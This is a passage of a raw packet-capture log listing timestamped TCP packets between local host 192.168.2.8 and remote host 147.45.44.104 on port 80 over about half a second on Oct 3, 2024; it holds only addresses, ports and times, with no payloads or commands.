                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774966002 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774980068 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.775001049 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.775042057 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.775042057 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.779860973 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.780148983 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879517078 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879538059 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879549026 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879617929 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879618883 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879661083 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879687071 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879688025 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879699945 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879734039 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879795074 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879808903 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879863977 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879863977 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.879863977 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.880496979 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.880537033 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.880548000 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.880608082 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.880608082 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.880608082 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.880640984 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.880652905 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.880723000 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881308079 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881344080 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881350040 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881361008 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881403923 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881650925 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881695986 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881707907 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881742001 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881803989 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881817102 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881865025 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881865025 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.881947041 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.884511948 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.884552002 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.884637117 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.884639025 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.884682894 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972410917 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972440004 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972451925 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972465038 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972517967 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972584009 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972595930 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972606897 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972620010 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972708941 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972722054 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972754002 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972754002 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972754002 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972754955 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972834110 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972932100 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972932100 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972939014 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.972954035 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973088026 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973099947 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973134041 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973155975 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973155975 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973155975 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973155975 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973196030 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973215103 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973299980 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973311901 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973324060 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973341942 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973341942 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973341942 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973341942 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973418951 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973431110 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973476887 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973476887 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973568916 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973759890 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973802090 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973813057 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973824978 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973882914 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973882914 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973973036 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.973993063 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974004030 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974037886 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974037886 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974117994 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974131107 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974142075 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974155903 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974246025 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974246025 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974253893 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974309921 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974334955 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974348068 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974359035 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974370003 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974384069 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974426031 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974589109 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974920988 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974958897 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.974972010 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975020885 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975020885 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975020885 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975043058 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975092888 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975130081 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975142956 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975155115 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975285053 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.975285053 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.977435112 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.977565050 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110354900 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110377073 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110385895 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110517979 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110529900 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110541105 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110551119 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110562086 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110563993 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110639095 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110678911 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110687971 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110733032 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110733032 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110733986 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110733986 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110773087 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110783100 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110793114 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110817909 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110857964 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110882998 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110893965 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110904932 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110943079 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.110991955 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111035109 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111046076 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111057043 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111067057 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111103058 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111228943 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111246109 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111255884 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111265898 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111275911 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111363888 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111433029 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111433983 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111433983 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111666918 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111711025 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111722946 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111752033 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111752033 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111848116 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111860037 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111871004 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111881971 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111911058 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.111911058 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112117052 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112128973 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112140894 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112169027 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112214088 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112215996 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112229109 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112241030 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112258911 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112271070 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112282038 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112292051 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112296104 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112296104 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112308979 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112334013 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112363100 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112405062 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112416029 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112427950 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112440109 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112530947 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112531900 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112531900 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112531900 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112574100 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112678051 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112678051 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112699986 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112710953 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112721920 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112756968 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112802029 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112813950 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112826109 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112843037 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112843037 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.112876892 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115484953 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115504980 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115515947 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115602016 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115602016 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115602970 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115616083 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115639925 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115650892 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115677118 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115714073 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115807056 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115818977 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115830898 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115843058 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115937948 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115937948 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115950108 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115961075 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115971088 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115983009 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.115993977 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116066933 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116066933 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116066933 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116157055 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116169930 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116179943 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116190910 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116203070 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116260052 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116260052 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116276979 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116276979 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116291046 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116545916 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.116545916 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292740107 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292757988 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292778015 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292789936 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292800903 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292813063 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292824030 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292834997 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292859077 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292859077 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292907000 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292907000 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.292943954 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:16.301794052 CEST8056259147.45.44.104192.168.2.8
